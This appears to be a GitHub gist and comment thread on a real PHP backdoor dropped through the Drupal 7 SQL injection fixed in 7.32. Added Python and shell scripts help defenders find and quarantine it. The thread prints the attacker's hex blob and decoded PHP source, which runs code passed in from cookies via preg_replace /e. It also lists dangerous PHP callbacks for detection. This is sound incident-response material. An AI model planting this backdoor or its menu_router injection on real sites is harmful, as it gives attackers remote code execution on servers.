
Remote code execution attempt (Drupal SA-CORE-2014-005, the SQL injection fixed in Drupal 7.32): the injected query inserts this binary data into the menu_router table. #drupalsa05

0x613a323a7b693a303b733a32333a226d6f64756c65732f7379736c6f672f727068622e706870223b693a313b733a3134373a223c3f7068702024666f726d313d40245f434f4f4b49455b224b63716633225d3b206966202824666f726d31297b20246f70743d24666f726d312840245f434f4f4b49455b224b63716632225d293b202461753d24666f726d312840245f434f4f4b49455b224b63716631225d293b20246f707428222f3239322f65222c2461752c323932293b207d20706870696e666f28293b223b7d

This attack adds a row to your menu_router table whose access_callback is file_put_contents() and whose access_arguments is the serialized array above: a file path, followed by PHP source.

When anyone requests that row's path, Drupal's menu system calls the access callback with those arguments, i.e. file_put_contents('modules/syslog/rphb.php', '<?php ...'), which drops a backdoor into the codebase. The attacker then requests that file directly. It reads a function name from the Kcqf3 cookie, applies it to the Kcqf2 and Kcqf1 cookies (a decoder such as base64_decode fits), and calls the result as $opt("/292/e", $au, 292). That call shape is consistent with preg_replace() under the /e modifier, which evaluates the replacement string as PHP, so the Kcqf1 cookie would carry the code to run. Without the cookies the file only prints phpinfo(), so a casual request shows nothing but that.

Check: query menu_router for rows whose access_callback is file_put_contents (or any other PHP function that writes files or evaluates code) and delete them; the first element of access_arguments tells you which file to look for in the codebase. Note that a cache clear or menu rebuild regenerates menu_router and silently removes the row but not the file it already wrote, so an empty result proves nothing about the filesystem.
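As an added example (not part of the gist, and not Drupal's own code), the following Python script decodes the hex blob above, parses the PHP-serialized access_arguments with a minimal parser that honours the declared string lengths, reports the file the row would write and the cookie names the backdoor reads, and flags rows from a menu_router dump whose access_callback is a file-writing or code-evaluating function. The hex blob is the one from the gist; the DANGEROUS_CALLBACKS list and the SAMPLE_ROWS dump are constructed for the demo.

```python
import re

# The 0x... literal from the gist: what the injected query writes into
# menu_router.access_arguments. Split into chunks only for readability.
GIST_HEX = (
    "0x613a323a7b693a303b733a32333a22"
    "6d6f64756c65732f7379736c6f672f727068622e706870"
    "223b693a313b733a3134373a22"
    "3c3f70687020"
    "24666f726d313d40245f434f4f4b49455b224b63716633225d3b"
    "20696620"
    "2824666f726d31297b20"
    "246f70743d24666f726d312840245f434f4f4b49455b224b63716632225d293b20"
    "2461753d24666f726d312840245f434f4f4b49455b224b63716631225d293b20"
    "246f707428222f3239322f65222c2461752c323932293b20"
    "7d20706870696e666f28293b223b7d"
)

# Constructed list: PHP functions that should never be a menu_router callback.
DANGEROUS_CALLBACKS = {
    "file_put_contents", "assert", "eval", "system", "exec", "passthru",
    "shell_exec", "create_function", "call_user_func", "call_user_func_array",
}

COOKIE_RE = re.compile(r'\$_COOKIE\["([^"]+)"\]')


def decode_hex_literal(hex_literal: str) -> str:
    """Turn a MySQL 0x... literal into the string it inserts (1 char per byte)."""
    h = hex_literal[2:] if hex_literal.lower().startswith("0x") else hex_literal
    return bytes.fromhex(h).decode("latin-1")


def php_unserialize_string_array(data: str) -> list:
    """Minimal parser for a PHP array of strings: a:N:{i:0;s:L:"...";...}.

    Only the shape the implant uses (int keys, string values) is supported.
    Declared lengths are honoured, so quotes and semicolons inside the
    payload cannot confuse the parser; a length mismatch raises ValueError.
    """
    head = re.match(r"a:(\d+):\{", data)
    if not head:
        raise ValueError("not a serialized PHP array")
    count, pos = int(head.group(1)), head.end()
    items = []
    for _ in range(count):
        key = re.compile(r"i:(\d+);").match(data, pos)
        if not key:
            raise ValueError("unsupported key type at offset %d" % pos)
        pos = key.end()
        val = re.compile(r's:(\d+):"').match(data, pos)
        if not val:
            raise ValueError("unsupported value type at offset %d" % pos)
        length, pos = int(val.group(1)), val.end()
        items.append(data[pos:pos + length])
        pos += length
        if data[pos:pos + 2] != '";':
            raise ValueError("length mismatch at offset %d" % pos)
        pos += 2
    if data[pos:pos + 1] != "}":
        raise ValueError("missing closing brace")
    return items


def describe_implant(hex_literal: str) -> dict:
    """Decode the blob and report what a request to the router path would write."""
    path, contents = php_unserialize_string_array(decode_hex_literal(hex_literal))[:2]
    return {
        "dropped_file": path,
        "payload_length": len(contents),
        "cookie_names": sorted(set(COOKIE_RE.findall(contents))),
        "calls_phpinfo": "phpinfo()" in contents,
    }


def suspicious_router_rows(rows):
    """rows: iterable of (path, access_callback, access_arguments) as dumped
    from menu_router. Returns the rows to delete and the file each would write."""
    hits = []
    for path, callback, access_args in rows:
        if callback not in DANGEROUS_CALLBACKS:
            continue
        dropped = None
        try:
            dropped = php_unserialize_string_array(access_args)[0]
        except (ValueError, IndexError):
            pass  # still report the row; the callback alone is enough
        hits.append({"path": path, "callback": callback, "dropped_file": dropped})
    return hits


# Constructed sample dump: one legitimate core row and the variant from the thread
# (payload shortened; lengths are correct for the strings shown).
SAMPLE_ROWS = [
    ("admin/config", "user_access", 'a:1:{i:0;s:27:"access administration pages";}'),
    ("cuyyct", "file_put_contents",
     'a:2:{i:0;s:24:"modules/trigger/eygo.php";i:1;s:16:"<?php phpinfo();";}'),
]

if __name__ == "__main__":
    print(describe_implant(GIST_HEX))
    for hit in suspicious_router_rows(SAMPLE_ROWS):
        print("DELETE FROM menu_router WHERE path = %r; then inspect %s"
              % (hit["path"], hit["dropped_file"]))
```

Feed suspicious_router_rows() the output of SELECT path, access_callback, access_arguments FROM menu_router; the dangerous-callback list is a starting point, not a complete one, and any callback that is not a function defined by a module you installed deserves a look.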

@joshkoenig
Owner

Translates out to serialized PHP:

a:2:{i:0;s:23:"modules/syslog/rphb.php";i:1;s:147:"<?php $form1=@$_COOKIE["Kcqf3"]; if ($form1){ $opt=$form1(@$_COOKIE["Kcqf2"]); $au=$form1(@$_COOKIE["Kcqf1"]); $opt("/292/e",$au,292); } phpinfo();";}
@joshkoenig
Owner

Seems like it is designed to drop a menu_router callback, and then hit it at a later date with an exploit payload in the cookie.

@baldwinlouie

This was a great heads up. I found a slight variant in one of my databases

+--------+----------------+------------------+-------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------+----------------+-------------------+-----+--------------+---------+------------+----------+-------+----------------+-----------------+----------------+-----------------+------+-------------+----------+--------+--------------+
| path | load_functions | to_arg_functions | access_callback | access_arguments | page_callback | page_arguments | delivery_callback | fit | number_parts | context | tab_parent | tab_root | title | title_callback | title_arguments | theme_callback | theme_arguments | type | description | position | weight | include_file |
+--------+----------------+------------------+-------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------+----------------+-------------------+-----+--------------+---------+------------+----------+-------+----------------+-----------------+----------------+-----------------+------+-------------+----------+--------+--------------+
| cuyyct | | | file_put_contents | a:2:{i:0;s:24:"modules/trigger/eygo.php";i:1;s:147:"<?php $form1=@$_COOKIE["Kcqf3"]; if ($form1){ $opt=$form1(@$_COOKIE["Kcqf2"]); $au=$form1(@$_COOKIE["Kcqf1"]); $opt("/292/e",$au,292); } phpinfo();";} | | NULL | | 0 | 0 | 0 | | | | | | | | 0 | cuyyct | | 0 | NULL |
+--------+----------------+------------------+-------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------+----------------+-------------------+-----+--------------+---------+------------+----------+-------+----------------+-----------------+----------------+-----------------+------+-------------+----------+--------+--------------+

@joshkoenig
Owner

Looks like this is trying to drop different files depending on how it's constructed. You should see if there's a modules/trigger/eygo.php file in your codebase.

@joshkoenig
Owner

Also, update your site! :)

@baldwinlouie

There was a file in the codebase. I found the file when I tried to git pull my Drupal update and git complained about this file. Sites updated. Scary one though!

@tamerzg
tamerzg commented Oct 18, 2014

It seems that the file has a random name and randomly gets inserted into one of the modules subdirectories, as I have seen it in different directories on a couple of my sites.
More info on how to find it and delete it: http://www.zoubi.me/blog/drupageddon-updating-drupal-732-not-enough-your-site-may-already-be-hacked
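Since the dropped file's name and directory vary (eygo.php under modules/trigger in one comment above, rphb.php under modules/syslog in the gist), searching by name is unreliable. The following POSIX shell script is an added example, not from the gist or from the linked post: it hunts the docroot for PHP files that call a variable as a function on a $_COOKIE value, which is the one thing every variant of this payload does, and moves any hit into a quarantine directory so the evidence survives for forensics instead of being deleted outright. DOCROOT is assumed to be the Drupal root; grep's --include option is assumed (GNU and BSD grep both have it).

```sh
#!/bin/sh
# Hunt for the Drupageddon cookie-driven backdoor by signature, not by name.
# Signature: a PHP variable invoked as a function on a $_COOKIE element,
# e.g.  $form1(@$_COOKIE["Kcqf2"])  as in the payload from the gist.

find_cookie_backdoors() {
    docroot="$1"
    # -r recurse, -l print only file names, -E extended regex, PHP files only.
    # In ERE, \$ \( \[ are literal characters; @? allows the error-suppressing @.
    grep -rlE --include='*.php' \
        '\$[A-Za-z_][A-Za-z0-9_]*\(@?\$_COOKIE\[' "$docroot" 2>/dev/null | sort
}

# Move every hit into $qdir, preserving its path relative to the docroot.
# Keep $qdir outside the docroot, or the next scan will find the copies.
quarantine_backdoors() {
    docroot="$1"
    qdir="$2"
    find_cookie_backdoors "$docroot" | while IFS= read -r f; do
        rel=${f#"$docroot"/}
        mkdir -p "$qdir/$(dirname "$rel")"
        mv "$f" "$qdir/$rel"
        printf 'quarantined %s\n' "$rel"
    done
}

# Usage:  sh hunt.sh scan /var/www/drupal
#         sh hunt.sh quarantine /var/www/drupal /root/drupal-quarantine
case "${1:-}" in
    scan)       find_cookie_backdoors "${2:-.}" ;;
    quarantine) quarantine_backdoors "${2:-.}" "${3:-/tmp/drupal-quarantine}" ;;
esac
```

Run the scan before and after applying the update: the update fixes the injection, and cache clears rebuild menu_router, but neither touches a file that was already written. Compare the quarantined file's mtime with your web server logs to find the request that dropped it and the IP that came back for it.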
